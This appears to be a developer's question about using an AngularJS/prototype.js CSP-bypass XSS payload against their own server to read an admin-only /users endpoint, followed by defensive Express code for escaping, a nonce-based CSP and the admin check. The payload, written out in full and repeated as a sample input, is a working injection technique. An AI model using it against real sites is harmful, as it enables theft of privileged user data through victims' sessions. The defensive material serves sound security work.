
Overcoming Middleware: Exploiting XSS to Retrieve Data

Çağlar Arlı


I am attempting to perform an XSS attack on my server and have successfully bypassed the CSP. In my server code, I store all users in the following manner:

  .get("/users", adminReq, (req, res) => {
    ...
  })

Due to the adminReq middleware, which is simply a check to verify if the requester is an admin, I am unable to retrieve the data within /users.

When an attacker executes an XSS attack within a text input, the following code effectively works only when adminReq is removed:

<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js"></SCRIPT>

<div ng-app ng-csp>
  {{$on.curry.call().eval("fetch('/users').then(response =>
    response.json()).then(data => alert(JSON.stringify(data)))")}}
</div>

How can an attacker retrieve the data through XSS despite the presence of the middleware?
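From the defender's side, the point of the setup above is that adminReq only authorizes the session that sends the request; it cannot tell an admin apart from script running inside that admin's page, so the protection has to be applied where the text input is rendered and in the CSP itself. The following is an added illustration, not code from the question, and it assumes a hypothetical server-side session flag `isAdmin` and a hypothetical `/static/app.js` as the page's own script.

```javascript
// Entity-encode user text placed inside an element body, so an injected
// <SCRIPT> or <div ng-app> tag is shown as text rather than parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Express-style middleware with the same contract as the question's adminReq.
// It assumes a server-side session object carrying an isAdmin flag (hypothetical).
// Note what it checks: the session, not who or what issued the fetch.
function adminReq(req, res, next) {
  if (req.session && req.session.isAdmin === true) return next();
  res.status(403).end('forbidden');
}

// Nonce-based CSP: only scripts the server emitted with this per-response nonce
// may run, so a whitelisted CDN host no longer supplies a ready-made library
// for an injected tag to load. object-src and base-uri are locked down as well.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}

// Render a user-controlled text field next to the page's own (nonced) script.
function renderProfile(userText, nonce) {
  return (
    `<script nonce="${nonce}" src="/static/app.js"></script>\n` +
    `<p class="bio">${escapeHtml(userText)}</p>`
  );
}

// Constructed sample input: the first tag of the question's payload plus an
// AngularJS bootstrap attribute, as it would arrive in the text field.
const SAMPLE_PAYLOAD =
  '<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>' +
  '<div ng-app ng-csp>{{1+1}}</div>';

// Stand-alone run: show the header and the rendered, inert markup.
const demoNonce = 'constructed-nonce-0001';
console.log('Content-Security-Policy: ' + buildCsp(demoNonce));
console.log(renderProfile(SAMPLE_PAYLOAD, demoNonce));
```

If the application itself bootstraps AngularJS on the page, HTML escaping alone does not stop `{{ }}` interpolation of text nodes; that client-side template injection is a separate issue to close in the template.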